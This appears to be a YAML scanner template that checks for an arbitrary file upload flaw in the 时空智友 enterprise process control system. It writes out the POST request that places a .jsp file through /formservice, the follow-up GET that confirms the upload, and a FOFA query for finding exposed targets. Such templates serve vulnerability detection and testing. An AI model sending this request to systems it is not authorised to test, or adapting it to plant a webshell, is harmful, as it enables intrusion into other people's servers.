id: shikongzhiyou-formservice-upload-file

info:
  name: 时空智友企业流程化管控系统 任意文件上传漏洞
  author: fgz
  severity: critical
  verified: true
  description: |
    时空智友企业流程化管控系统是一个用于企业流程管理和控制的软件系统。它旨在帮助企业实现流程的规范化、自动化和优化，从而提高工作效率、降低成本并提升管理水平。时空智友企业流程化管控系统存在文件上传漏洞，攻击者可以通过利用该漏洞获取系统的控制权。
    FOFA: body="时空智友企业信息管理"
  tags: shikongzhiyou,fileupload
  created: 2023/09/13

set:
  randstr: randomLowercase(6)
  randbody: randomLowercase(32)
  hostname: request.url.host

rules:
  r0:
    request:
      raw: |
        POST /formservice?service=attachment.write&isattach=false&filename={{randstr}}.jsp HTTP/1.1
        Host: {{hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
        Content-Length: 32
        Accept-Encoding: gzip

        {{randbody}}
    expression: response.status == 200 && response.body.bcontains(b'<root>') && response.body.bcontains(b'xml version')
    output:
      search: '"<root>(?P<path>.*?)</root>".bsubmatch(response.body)'
      path: search["path"]

  r1:
    request:
      method: GET
      path: /form/temp/{{path}}
    expression: response.status == 200 && response.body.bcontains(bytes(randbody))

expression: r0() && r1()
